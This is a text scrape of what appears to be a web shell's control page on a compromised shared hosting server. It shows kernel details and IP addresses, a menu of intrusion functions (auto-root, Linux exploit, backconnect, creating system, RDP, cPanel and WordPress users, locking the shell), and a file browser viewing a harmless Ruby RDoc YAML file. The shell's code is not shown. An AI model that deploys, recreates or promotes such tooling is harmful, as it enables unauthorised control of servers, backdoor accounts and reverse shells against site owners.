Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby18 /
share /
ri /
1.8 /
system /
RDoc /
TopLevel /
[ HOME SHELL ]
Name
Size
Permission
Action
add_class_or_module-i.yaml
549
B
-rw-r--r--
all_classes_and_modules-c.yaml
208
B
-rw-r--r--
cdesc-TopLevel.yaml
1.05
KB
-rw-r--r--
find_class_named-c.yaml
198
B
-rw-r--r--
find_class_or_module_named-i.y...
220
B
-rw-r--r--
find_local_symbol-i.yaml
202
B
-rw-r--r--
find_module_named-i.yaml
256
B
-rw-r--r--
full_name-i.yaml
180
B
-rw-r--r--
new-c.yaml
177
B
-rw-r--r--
reset-c.yaml
172
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : add_class_or_module-i.yaml
--- !ruby/object:RI::MethodDescription aliases: [] block_params: comment: - !ruby/struct:SM::Flow::P body: Adding a class or module to a TopLevel is special, as we only want one copy of a particular top-level class. For example, if both file A and file B implement class C, we only want one ClassModule object for C. This code arranges to share classes and modules between files. full_name: RDoc::TopLevel#add_class_or_module is_singleton: false name: add_class_or_module params: (collection, class_type, name, superclass) visibility: public
Close